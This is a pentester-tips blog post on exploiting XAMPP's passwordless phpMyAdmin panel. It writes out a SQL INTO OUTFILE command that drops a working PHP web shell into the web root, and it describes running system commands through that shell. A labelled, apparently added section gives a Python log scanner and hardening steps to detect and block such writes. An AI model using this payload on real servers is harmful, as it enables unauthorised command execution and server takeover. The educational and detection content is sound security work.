Tips for an Information Security Analyst/Pentester career - Ep. 29: XAMPP and SQL exploitation

I already mentioned in one of my latest posts that it's possible to access the phpMyAdmin panel from XAMPP without a password.

However, because of time constraints, I didn't show you what you can actually do by running SQL commands on it.

This time I'm gonna delve more into this topic.


So, let's access the phpMyAdmin panel like we did last time.

The first command I want to run is SHOW DATABASES; to retrieve all databases created on XAMPP.


It doesn't return us anything very juicy.

The most dangerous vulnerability we can exploit this way, though, is uploading a PHP shell by using SQL syntax.

I could have easily used a reverse shell, but it was easier to just upload a shell that can run system commands when invoked.

For this, I used the following syntax:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php";

This lets us write PHP code into a PHP file that will be created in the web server directory (which, in Windows, is C:\xampp\htdocs, while in UNIX/Linux it is /opt/lampp/htdocs).

In other words, it lets us create a PHP shell on the server by using SQL commands (a SELECT statement).


When we call the shell and pass it a system command, the output is displayed in our browser.

Below is the result returned by running the netstat command.

You can easily understand the scary security implications from all this.

I could have very easily uploaded a reverse PHP shell and completely taken over the server.

It's that easy.
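On the defensive side, this kind of write is easy to spot in the database server's query log. The following is an added example, not code from the original post: a small Python scan that flags SELECT ... INTO OUTFILE / DUMPFILE statements and rates them by whether the target is a script inside one of the web roots named above. It assumes the general query log is enabled and that each line contains the statement text; the function names, severity labels and sample log lines are constructed for illustration.

```python
import re

# Web roots named in the post; add others for a non-default install.
WEB_ROOTS = ("c:/xampp/htdocs", "/opt/lampp/htdocs")
SCRIPT_EXTS = (".php", ".phtml", ".phar")

# INTO OUTFILE / INTO DUMPFILE plus a quoted path; the space before the
# quote is optional, as in the statement shown in the post.
OUTFILE_RE = re.compile(r"""\binto\s+(?:outfile|dumpfile)\s*(['"])(.+?)\1""", re.IGNORECASE)

def normalize(path):
    """Collapse escaped backslashes and slashes to '/', lower-case the result."""
    return re.sub(r"[\\/]+", "/", path).lower()

def classify(statement):
    """Return (severity, path) for a file-writing statement, else None."""
    m = OUTFILE_RE.search(statement)
    if not m:
        return None
    path = normalize(m.group(2))
    in_web_root = any(path.startswith(root + "/") for root in WEB_ROOTS)
    is_script = path.endswith(SCRIPT_EXTS)
    if in_web_root and is_script:
        return ("critical", path)
    if in_web_root or is_script:
        return ("high", path)
    return ("review", path)

def scan(log_lines):
    """Return [(line_number, severity, path)] for every flagged line."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        hit = classify(line)
        if hit:
            hits.append((n, *hit))
    return hits

# Constructed sample lines in a simplified "<thread id> Query <statement>" layout.
SAMPLE_LOG = r"""
12 Query  SHOW DATABASES
12 Query  SELECT "<?php system($_GET['cmd']); ?>" into outfile"C:\\xampp\\htdocs\\shell.php"
13 Query  SELECT * FROM orders INTO OUTFILE '/tmp/orders.csv'
14 Query  SELECT name FROM t INTO DUMPFILE '/opt/lampp/htdocs/export.txt'
""".strip().splitlines()

if __name__ == "__main__":
    for n, severity, path in scan(SAMPLE_LOG):
        print(f"line {n}: {severity:8} {path}")
```

Setting a password on the database root account and pointing the server's secure_file_priv option at a directory outside the web root prevents the write that this scan detects.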

Thank you for your time.

